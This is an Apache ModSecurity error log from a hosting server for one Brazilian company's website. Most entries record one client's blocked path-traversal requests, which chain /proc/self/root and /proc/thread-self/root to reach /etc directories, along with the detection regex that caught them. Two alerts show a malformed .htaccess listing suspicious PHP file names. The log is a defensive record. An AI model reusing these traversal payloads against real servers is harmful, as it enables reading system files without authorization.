[Thu Mar 19 05:31:33.335265 2026] [:error] [pid 30077:tid 140411557287680] [client 74.7.243.128:57784] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/pure-ftpd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abu0Zfu8EFLIOrSqIpt08AAAAlY"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Thu Mar 19 05:31:35.689987 2026] [:error] [pid 31803:tid 140411565680384] [client 74.7.243.128:57798] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/terminfo"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abu0ZuyqAr6etmhZHNo5OQAAAFU"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Thu Mar 19 05:31:48.714662 2026] [:error] [pid 19093:tid 140411733534464] [client 74.7.243.128:57802] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/statetab.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abu0dF_V7PWP6ixUYl6RcQAAAoE"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Thu Mar 19 05:31:50.054429 2026] [:error] [pid 17887:tid 140411691570944] [client 74.7.243.128:46420] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/modules-load.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abu0dgkwaGbbGflqUZCMcQAAAMY"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Thu Mar 19 05:31:51.335199 2026] [:error] [pid 17653:tid 140411683178240] [client 74.7.243.128:46426] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/cloud"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abu0d8df6f5d65gmYZRJbwAAAsc"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Thu Mar 19 05:31:52.658975 2026] [:error] [pid 15826:tid 140411590858496] [client 74.7.243.128:46442] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/rwtab.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abu0eOoXxyEfFpUF8f_mSgAAAVI"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Thu Mar 19 05:31:54.008926 2026] [:error] [pid 27403:tid 140411658000128] [client 74.7.243.128:46448] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/yum.repos.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abu0ehkFeYa1D6dYQnDEnwAAAco"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Thu Mar 19 05:31:56.532539 2026] [:error] [pid 17887:tid 140411725141760] [client 74.7.243.128:46456] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/lwcorp"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abu0fAkwaGbbGflqUZCMcwAAAMI"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Thu Mar 19 05:32:13.415648 2026] [:error] [pid 17653:tid 140411590858496] [client 74.7.243.128:46464] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/skel"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abu0jcdf6f5d65gmYZRJgwAAAtI"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Thu Mar 19 05:32:17.959730 2026] [:error] [pid 15826:tid 140411716749056] [client 74.7.243.128:42164] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/audit"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abu0keoXxyEfFpUF8f_mcwAAAUM"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Thu Mar 19 05:32:19.237915 2026] [:error] [pid 17887:tid 140411716749056] [client 74.7.243.128:42176] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/cron.monthly"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abu0kwkwaGbbGflqUZCMfwAAAMM"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Thu Mar 19 05:32:20.575004 2026] [:error] [pid 17653:tid 140411540502272] [client 74.7.243.128:50084] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/opt"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abu0lMdf6f5d65gmYZRJhAAAAtg"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Thu Mar 19 05:32:20.771097 2026] [:error] [pid 17653:tid 140411624429312] [client 74.7.243.128:50084] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/popt.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abu0lMdf6f5d65gmYZRJhQAAAs4"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Thu Mar 19 05:32:23.605072 2026] [:error] [pid 27403:tid 140411716749056] [client 74.7.243.128:50096] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/kernel"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abu0lxkFeYa1D6dYQnDEswAAAcM"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Thu Mar 19 05:32:25.996019 2026] [:error] [pid 14269:tid 140411683178240] [client 74.7.244.43:58492] [client 74.7.244.43] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "www.bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "abu0mQbLMZ6AikZjR9UzBAAAAAc"]
[Thu Mar 19 05:32:26.003881 2026] [:error] [pid 27293:tid 140411557287680] [client 74.7.243.128:50104] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/lldpd.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abu0mv-YZRR_7pZ7nDJjhQAAA9Y"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Thu Mar 19 05:32:34.187330 2026] [core:alert] [pid 17887:tid 140411632822016] [client 57.141.18.120:60724] /home/storage/0/fc/16/bandeirantesbomb3/public_html/.htaccess: </FilesMatch> without matching <FilesMatch> section
[Thu Mar 19 05:32:34.727709 2026] [:error] [pid 17887:tid 140411716749056] [client 74.7.243.128:50120] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/httpd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abu0ogkwaGbbGflqUZCMkAAAAMM"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Thu Mar 19 05:32:37.438396 2026] [mime_magic:error] [pid 14269:tid 140411708356352] (70014)End of file found: [client 57.141.18.123:60826] AH01513: mod_mime_magic: read failed: /home/storage/0/fc/16/bandeirantesbomb3/public_html/index.php
[Thu Mar 19 05:32:53.274561 2026] [:error] [pid 26799:tid 140411599251200] [client 74.7.243.128:37160] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/udev"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abu0tda6ubjKNq_cu4YY-AAAA1E"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Thu Mar 19 05:33:04.973881 2026] [core:alert] [pid 31803:tid 140411708356352] [client 57.141.18.32:33308] /home/storage/0/fc/16/bandeirantesbomb3/public_html/.htaccess: </IfModule>custom-header.php|ms-delete-site.php|options-permalink.php|term.php|customize.php|link-add.php|ms-edit.php|options.php|edit-comments.php|link-manager.php|ms-options.php|options-reading.php|system_log.php|inputs.php|adminfuns.php|chtmlfuns.php|cjfuns.php|classsmtps.php|classfuns.php|comfunctions.php|comdofuns.php|connects.php|copypaths.php|delpaths.php|doiconvs.php|epinyins.php|filefuns.php|gdftps.php|hinfofuns.php|hplfuns.php|memberfuns.php|moddofuns.php|onclickfuns.php|phpzipincs.php|qfunctions.php|qinfofuns.php|schallfuns.php|tempfuns.php|userfuns.php|siteheads.php|termps.php|txets.php|thoms.php|postnews.php|txets.php)$'> without matching <IfModule>custom-header.php|ms-delete-site.php|options-permalink.php|term.php|customize.php|link-add.php|ms-edit.php|options.php|edit-comments.php|link-manager.php|ms-options.php|options-reading.php|system_log.php|inputs.php|adminfuns.php|chtmlfuns.php|cjfuns.php|classsmtps.php|classfuns.php|comfunctions.php|comdofuns.php|connects.php|copypaths.php|delpaths.php|doiconvs.php|epinyins.php|filefuns.php|gdftps.php|hinfofuns.php|hplfuns.php|memberfuns.php|moddofuns.php|onclickfuns.php|phpzipincs.php|qfunctions.php|qinfofuns.php|schallfuns.php|tempfuns.php|userfuns.php|siteheads.php|termps.php|txets.php|thoms.php|postnews.php|txets.php)$'> section
[Thu Mar 19 05:33:07.749093 2026] [:error] [pid 14269:tid 140411565680384] [client 74.7.243.128:50662] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/gss"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abu0wwbLMZ6AikZjR9UzPQAAABU"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Thu Mar 19 05:33:11.408192 2026] [:error] [pid 26799:tid 140411582465792] [client 74.7.243.128:46330] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/plymouth"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abu0x9a6ubjKNq_cu4YY_wAAA1M"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Thu Mar 19 05:33:15.227130 2026] [:error] [pid 31803:tid 140411616036608] [client 74.7.243.128:52082] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/dracut.conf.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] 